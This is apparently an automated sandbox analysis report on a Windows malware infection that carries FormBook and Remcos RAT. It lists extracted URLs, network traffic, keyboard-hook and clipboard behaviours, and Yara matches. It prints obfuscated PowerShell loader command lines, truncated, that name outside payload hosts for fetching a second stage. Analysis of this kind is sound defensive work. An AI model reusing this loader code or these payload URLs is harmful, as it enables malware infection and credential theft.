Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000014.00000002.2517724529.000000000380D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comata
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 00000008.00000002.3327352353.00000000222B0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 00000010.00000002.2533483224.0000000002EB4000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000002.00000002.2568004154.0000021493641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2457149588.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3202569251.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2824348491.00000000049D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBcq
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: wab.exe, 00000008.00000003.2493992487.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duelvalenza.it/
Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmp, wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.bin
Source: wab.exe, 00000008.00000002.3312967278.0000000021D50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binLagdsWaheuroprotectie.ro/FIPWKWOaFXJGe178.bin
Source: wab.exe, 00000008.00000002.3295424016.000000000643F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duelvalenza.it/FIPWKWOaFXJGe178.binq(
Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2568004154.0000021495668000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://europrotectie.ro
Source: powershell.exe, 00000002.00000002.2568004154.0000021493866000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://europrotectie.ro/Methink1.thnP
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://europrotectie.ro/Methink1.thnXRwl
Source: powershell.exe, 00000005.00000002.2457149588.0000000004CA8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2568004154.0000021494A34000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: wab.exe, 00000010.00000003.2531648040.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000002.2534668907.00000000033D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000010.00000003.2518435340.0000000004BB1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000002.00000002.2692569252.00000214A36AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2461742751.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, wab.exe, 00000014.00000002.2512248136.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 188.212.111.134:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 46.254.34.12:443 -> 192.168.2.5:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 16_2_0041183A
Contains functionality to modify clipboard data
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 16_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 16_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 16_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 19_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 19_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 20_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 20_2_004072B5

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000003.2537135847.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3295624818.000000000647C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\mvourhjs.dat, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_2132.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_2668.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_5804.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_6324.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000019.00000002.3019175755.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000019.00000002.3056858069.0000000023690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001E.00000002.3289864871.0000000000D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001D.00000002.3291632690.00000000044E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001E.00000002.3289791266.0000000000D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001E.00000002.3288503989.0000000000460000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000001F.00000002.3289923987.0000000000F40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6324, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6231
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 6007
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6007
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6231 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6231 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 6007 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 6007 Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripetalous='S';$Tripetalous+='ubstrin';$Tripetalous+='g';Function Teucrium($Gdskes){$Expirable=$Gdskes.Length-$gdnings;For($Heltemodiges=4; $Heltemodiges -lt $Expirable; $Heltemodiges+=(5)){$Mirakeldoktorerne+=$Gdskes.$Tripetalous.Invoke($Heltemodiges, $gdnings);}$Mirakeldoktorerne;}function Regulerbare($Reticularia){& ($Bestandigst) ($Reticularia);}$Planlggelserne235=Teucrium 'LeopMC,mpo Croz FreiPrpol.hrilM rgaBri /Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon.lgndPreeo eksw,olisSttt ,ppNupt T Yie Red1ud.i0 Mul.Fodb0 Ska; Skr AssuWByttiOvernSe.s6.oti4El.x; Tre DepexWhis6U mo4 De,;Vsk, Alir,entv Stt:.aus1,esu2 Pic1Fagb.Cryp0 M t)W.tc D.lgGOpree npcTrickStigoSkgg/,jle2 Kry0 Me 1S lt0Stoc0Cruo1Frkk0Sahu1Skru KontFSkaniPertrUpcre Kiaf ValoNdrixLavr/Konv1Floc2Scou1Appl.,ont0Stru ';$improvers=Teucrium 'ArbeUDoubsTaleePianrTarv-,rogATwitgSclae P.lnte stKlas ';$Ovariectomize=Teucrium 'A rthSemit MastSuffpDykksNonp: Saa/Nedj/OrtoeGensu Lymrjyd.oPimepBegirNgomoF,rst Jere,agncanstt FidiSocieVir,. T sr.fproCh.r/GlasMTri,e CiktArb,hmargiSemin AaskNice1phle. TaktNonrhKdlsnOver ';$Astor=Teucrium 'Nonf> nd ';$Bestandigst=Teucrium ' PleiL.doeSp,lxSkit ';$Executry203='smittefaren';Regulerbare (Teucrium 'pugiSTecoePelstDeta-ventCFl.loDelinInddtPrepeTilbnFreet Taa Lill-Ex.ePBehea.psot Ab hPeri RakeT K,o:Gemm\AdjuNTartvBossn oce MatlTemps,obbeeu,o. FortEpipxEsthtBifr Whis-GarbV RefaTor lUndeuBoreeHyl Pier$BlysE remxRe.peBigacDionuBnsktNonsr A,kyDoci2Nedv0Term3r,ma; Men ');Regulerbare (Teucrium 'Untri Ov.fHaem Sal,(Tudbt Brue Kunsapp tZebr- alpNo sa .irt O qh Bi NoneTGerm:Ecot\Re pNdor v Ston Mone AcelToilsAgroeAfsk.Tre.tFro x DeptHjlp)Euph{QuiceAfsyxKvadiTe.rtSqui}M,le;Mi.l ');$Teariness = Teucrium 'FrereDynecScrahimp.o Gid brul%.ddea,uffp Hi pFilhdMadnaNi,at Ma,aSkum%Ha g\BeavPOv rr NoleDiscs Mani iklgDiagnPappa t,slVed 2Shir3Bu g.syndH,alla Konl Uni Fl,&Pose&Eate BylieBillcAfhohPanto Kns Ve s$tota ';Regulerbare (Teucrium 'P.lu$C.shgMa,tlAbonoEnthbAspeaUsorlK ap:Fores Timu Av,bAn ri Alinram,sOprre FrerConjtSpariUn coCronnKass= Tek(Sprnc KremDertdM.lj Felt/ HaycMerc Over$romeT ,rleLeveaScrur Pa.i MisnKalde orrsRaglsBewh)Wamu ');Regulerbare (Teucrium 'Sku,$HavigAcrolD.inoVipebLmlea banlM rk: EarTDiobaWeevaUdbyl Ly mAffao F,rdB,rti C,ag Spkh Udse.ndbdAmin= Con$ tevOCarov.atra OdorPolyiRepreOvercTordtSor.oStorm acciBe,nzSamdeBybu.Mil,srek.pr onlDhoti usttLivs(afsk$ .obA RegsBrantDivioGeinrD.mo)A.me ');$Ovariectomize=$Taalmodighed[0];Regulerbare (Teucrium ' bra$ lobg MallT.lfoT rbbAfh.aSenelS,co:Pos D IderBerbiMetof A itlinesGimbp ProrGlewoEumeb Kval Skaedispm U seSkrur PensNois=.kvaND ugePaliw Vul- HarO egabArmojFlereAldrc F.rtCy e Man SUna yN nssBkketTabeeF,rgmHakk.Dis.N Exte BritBar,.BrieWEthieFan,bEfteCSaltlManni.lideBrnenBaa,t Tem ');Regulerbare (Teucrium 'foli$ rusDPleorAmtsiKlokfovertA sesRolap Te.rCil.oUdlubCretlG,beeI Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Raakolde = 1;$Fornrmet='S';$Fornrmet+='ubstrin';$Fornrmet+='g';Function Circumflexes($Cumulet){$Semimonarchically=$Cumulet.Length-$Raakolde;For($Habitually=4; $Habitually -lt $Semimonarchically; $Habitually+=(5)){$Wenzel+=$Cumulet.$Fornrmet.Invoke($Habitually, $Raakolde);}$Wenzel;}function Jettes($trendy){&($Indbagendes) ($trendy);}$Simultansceners=Circumflexes 'Ark,MMervoAn.czVampiT lel ElelBlreaSy.o/Jagt5 ve.Seac0T,sp Ryg.( KrmW.urdiRiitn s rdPi do.orhwAllosHjem G,oN PraT.oli ,eg1Inte0Remb.Spra0Anal;Duct Ret.WVagtiAtomnskyt6Aced4 Non;Falc F.glx.art6Pseu4.icr;Rovf MilrGramvNert:Nara1H,lg2Rive1Unde.Sopr0Pres)Vrd. P.slG,ndeeCubacSkinkTilloOffp/Slib2Pl r0Ned,1Appe0Onyc0Ven,1 enn0Trfi1 Bre V deFMickiKonsr traeA.trf dr oQrscxSamm/Moor1Hard2 ,or1Werf.,yde0.uto ';$Optrins45=Circumflexes 'tidsUI.prsP,yceSkabrover-StemAUkeng,ondeLivinE,tetHera ';$Levemulighed=Circumflexes 'B,slhG,ldt MentInflpKo,m:Conf/Ke,d/,ndf8Ago.7 bal.Pige1Cann2.ejl1 Fer.,rol1Diet0Nona5 Ske..ata1 Bl,6Ex.e3Kast/SrmrD Kile Ne.tSkreeIndmn rot MyxiBe aoKonknConse BoynDesi.s,rtj.attaDissv toda Non ';$Cose=Circumflexes 'Skor>Undi ';$Indbagendes=Circumflexes 'Dm,niMilieSelsx Bar ';$Nutritionary133='Paakldtes';Jettes (Circumflexes 'Ch dSSonaeAutotAlda-UnmyC.rocoValgn,annt Ende.enin S.dtO er Can- NobP ixta Fo.tBindhMe.k VrdiTSorg:Baga\Pt.rFbureoPot,rOutshTot,j S.iuretrlillesFletbTikmr GabeSmaamRadesAmoreT ivs.lbn.MargtAircx iltSaut Pote-La dVKinea Boll SafuEncaeDiap ,npr$CausN IlluDiglt Tndr,nbriKon,tBra,iUn.koDegenSpydaTricr egnyKrim1K.ip3Erem3L.eb; Bri ');Jettes (Circumflexes 'Tr.ni.inkfHoo. Skil(Indit AroeUndesuafmtEpit-DrukpFareaSkibtDuplhAfid silTRuck:None\Sla,F Sgeo Bu,rTec.hobsejAp.puQuanlBloks ostbs,mmrP osePal.mSocisCudbe Pics A,m.Te rtBre,xDigit ,fl),era{Giske andxRe aiNacrtCham}Pg.e;Ergo ');$Ballplayers248 = Circumflexes ' nkeSpikc Udmhsiego lgu Eksp%S,paaBagepTaktpOtopdElemaimpetarchaTran%She,\ParaATrignKolltHo,eiangulSkrmltr.ke Anpa JounChr,1Umed4 C.s4Sur...lumGVilkrBel.oJe n Ef e&sa,m&D.ge UpfieBil cUnnah KreoN,np Ci.i$ Kri ';Jettes (Circumflexes 'Real$,eclgFalsl.nifoAxi,bWolfaAfselCoin:SgesFScrso vrmrBrbaaBronn kkek Tabr,obbiGre nResig Kr,s oltpOveruCafenOverksol t KureBagnt Bits .ps=Abd.(dab,cSju.mEl md ,in Ferr/Calcc Ch, F rs$BedrBPi radra,lSna lurfjpMarklDialaIrr.yIndve R,trSeiss Puz2Duct4Ba.h8Phot)Dri ');Jettes (Circumflexes 'Ha.l$SlvsgEftel nfoSt,ibM.inaTabplTick: SpeA MoklEctovSubte UneoRegilSndaiErodtDispemdresTol =Lnn,$MyndLRaskeSkilv W.veForbmStrauf rflGauki.azigYemehPreee TradDole.RegesEft.p Ci.lIndaiVar.tVa,e(Sume$EnheCFormo.dves Pree G.n)Spil ');$Levemulighed=$Alveolites[0];Jettes (Circumflexes 'Anbr$.addgU.trl ,taoim ebTa.ba.alclB,nk:BestS.orkk GibeM,aspJotatS yti ,uncCoa,=partNDagbe KecwUrok-,lafOwainb ejljSkrseUns.curo.t.onc B anSSvalyVands igmtM.sceJug mSoap.FascNPhyleFre,t iga..oncWHetee Cikb istCDeralkin iSporeMetanMapptF er ');Jet Jump to behavior
Contains functionality to call native functions
